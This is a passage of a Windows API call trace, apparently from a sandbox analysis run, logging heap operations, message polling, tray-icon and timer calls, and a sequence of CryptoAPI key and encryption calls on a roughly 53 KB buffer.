lpProcName="CryptGetKeyParam") returned 0x74f477cb [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0185.293] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c26f8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26f8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0185.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0185.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.295] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0185.295] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0185.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0185.295] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.295] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.295] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.295] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.296] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.296] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.296] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0185.296] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.296] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.296] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0185.296] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.296] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.296] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0185.296] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0185.296] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0185.296] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.296] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.296] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.296] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.296] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.296] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.296] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0185.297] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.297] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xcfe0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xcff0) returned 1 [0185.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.297] CharLowerBuffW (in: lpsz="byte[53233]", cchLength=0xb | out: lpsz="byte[53233]") returned 0xb [0185.297] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.299] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.299] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.299] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0185.300] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.300] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa6bff0*, pdwDataLen=0x87e820*=0xcfe0, dwBufLen=0xcff0 | out: pbData=0xa6bff0*, pdwDataLen=0x87e820*=0xcff0) returned 1 [0185.300] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.300] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.300] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.302] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.302] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.302] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.302] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0185.302] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.302] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0185.302] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0185.302] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0185.302] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.302] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.302] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0185.302] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.302] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0185.302] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.305] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.306] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.306] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.330] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.330] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.330] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0185.330] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0185.330] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.330] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0185.330] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.330] CryptDestroyKey (hKey=0x90af98) returned 1 [0185.331] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0185.343] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 1 [0185.343] TranslateMessage (lpMsg=0x87f04c) returned 0 [0185.343] DispatchMessageW (lpMsg=0x87f04c) returned 0x0 [0185.343] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e6e8) returned 1 [0185.344] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0185.344] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0185.344] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0185.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0185.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0185.344] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0185.344] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0185.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0185.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0185.344] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0185.344] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0185.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0185.344] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0185.344] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0185.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0185.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0185.345] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.345] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0185.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0185.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0185.345] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0185.345] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0185.345] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0185.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0185.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0185.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0185.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0185.345] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0185.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0185.345] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0185.345] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0185.345] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0185.346] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0185.346] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0185.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.346] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0185.346] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.346] 